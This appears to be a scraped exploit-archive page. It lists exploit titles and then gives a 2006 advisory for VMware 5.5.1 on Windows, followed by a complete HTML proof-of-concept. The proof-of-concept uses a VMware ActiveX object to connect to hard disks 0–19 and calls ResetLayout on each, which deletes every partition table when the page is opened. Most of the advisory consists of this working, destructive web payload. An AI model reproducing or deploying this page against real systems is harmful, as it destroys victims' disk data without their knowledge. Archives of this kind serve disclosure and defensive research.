477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
65 lines
1.6 KiB
HTML
Executable file
65 lines
1.6 KiB
HTML
Executable file
<!--
|
|
|
|
[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
|
|
Advisory ID:
|
|
XSec-06-05
|
|
|
|
Advisory Name:
|
|
VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
|
|
Release Date:
|
|
08/16/2006
|
|
|
|
Tested on:
|
|
VMware 5.5.1 build-19175 on Windows Server 2000/2003
|
|
|
|
Affected version:
|
|
VMware 5.5.1
|
|
|
|
Author:
|
|
nop <nop#xsec.org>
|
|
http://www.xsec.org
|
|
|
|
Overview:
|
|
On running windows system, you can't delete, format and change system dirver. \
|
|
VMware register a COM Object use for Virtual Disk, but it's very danger. \
|
|
I don't know how to name this issue. If you allow unsafe ActiveX and jscript, \
|
|
and has VMware installed, the vmware.htm will delete all harddisk partition \
|
|
table on the windows system. please backup your partition table first.
|
|
|
|
Exploit:
|
|
|
|
=============== vmware.htm start ================
|
|
|
|
|
|
// VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
// Tested on Windows Server 2000/2003
|
|
//
|
|
// nop nop#xsec.org
|
|
// http://www.xsec.org
|
|
//
|
|
|
|
// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}
|
|
// Info: Vie2Locator Class
|
|
// ProgID: VieLib2.Vie2Locator.1
|
|
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual Image Editing\vielib.dll
|
|
|
|
-->
|
|
|
|
<html><body>
|
|
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}" id="vmware"> </object>
|
|
<script>
|
|
|
|
var disk = 0; // HardDisk No
|
|
|
|
while (disk < 20)
|
|
{
|
|
var x = vmware.ConnectDisk(disk); // Connect to HardDisk
|
|
x.ResetLayout(); // Will clean all partition table on your Harddisk
|
|
disk += 1;
|
|
}
|
|
</script>
|
|
</body></html>
|
|
|
|
# milw0rm.com [2006-08-16]
|